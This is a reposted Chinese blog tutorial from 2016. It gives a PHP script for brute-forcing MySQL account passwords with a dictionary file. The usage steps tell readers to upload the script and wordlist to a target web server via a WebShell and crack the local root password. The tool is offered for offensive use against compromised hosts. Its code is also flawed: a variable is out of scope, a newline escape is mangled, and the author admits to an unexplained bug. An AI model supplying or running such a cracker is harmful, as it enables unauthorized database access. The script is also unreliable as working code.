当前位置:首页 > 计算机 > 教程 > 正文内容

PHP Mysql 密码暴力破解脚本

康哥工作室8年前 (2016-02-25)教程13770
··································
·本文非原创  资源来自网络 ·
··································

<?
set_time_limit(0); //脚本不超时

$ip = "localhost"; //IP
$user = "root"; //用户名
$passwd = file("password.txt"); //密码字典

for($i=0; $i<count($passwd); $i++){
$pass = Str_Replace("rn", "", $passwd[$i]); //剔除多余的回车+换行
connect($user, $pass);
flush();
}
echo "扫描结束!";

function connect($user, $pass) {
if(@mysql_connect($ip, $user, $pass)){
echo "<font color='#0000FF'><b>得到密码:<font color='#FF0000'>".$pass."</font>!!!</b></font>";
exit();
}
else {
echo $pass.'<br>';
}
}
?>

 

用法:
1、修改PHP 代码中的用户名
2、准备字典password.txt,每行一个,理论上支持无数行。
3、将脚本和字典一起传到目标Web服务器上,访问该脚本,即开始暴力破解,破解结果实时输出,盯着就行了。

代码简单的不能再简单了,就不解释了,功能很简单,传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。
已知有一处Bug,不清楚为何,密码数量少的时候,准确率100%,但是当密码数量达到5000以上时,准确率0%,明明正确的密码,却不显示正 确,除非 你把这个密码放在字典最末尾,才显示正确,不清楚是什么原因造成的,开始以为是暴破间隔时间太短,加了延时函数,还是这样。。。
或许只是我个别原因?各位试试就知道了。

相关文章

SPRITEKING PHP彩蛋信息泄露

SPRITEKING PHP彩蛋信息泄露

Easter Eggs(复活节彩蛋)外行人估计不了解这是神木玩意,彩蛋的网络解释是:用于电脑、电子游戏、电脑游戏、影碟或其他互动多媒体之中 的隐藏功能或信息。PHP包含一个安全漏洞,...

PHP防刷代码网站不再被F5刷死

PHP防刷代码网站不再被F5刷死

不晓得大家有没有遇到过网站被暴力F5刷新刷死的?如果你曾经的确遇到过这样的问题,那么接下来的文章可能对你而言就是一片非常实用的好文了,骚包也是刚刚在流量互联网的时候无意中发现的这篇文章,现在把网站防F...

php程序员=须知的PHP代码优化的40条

php程序员=须知的PHP代码优化的40条

php程序员须知的40条建议和方法。 1.如果一个方法可静态化,就对它做静态声明。速率可提升至4倍。 2.echo 比 print 快。 3.使用echo的多...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。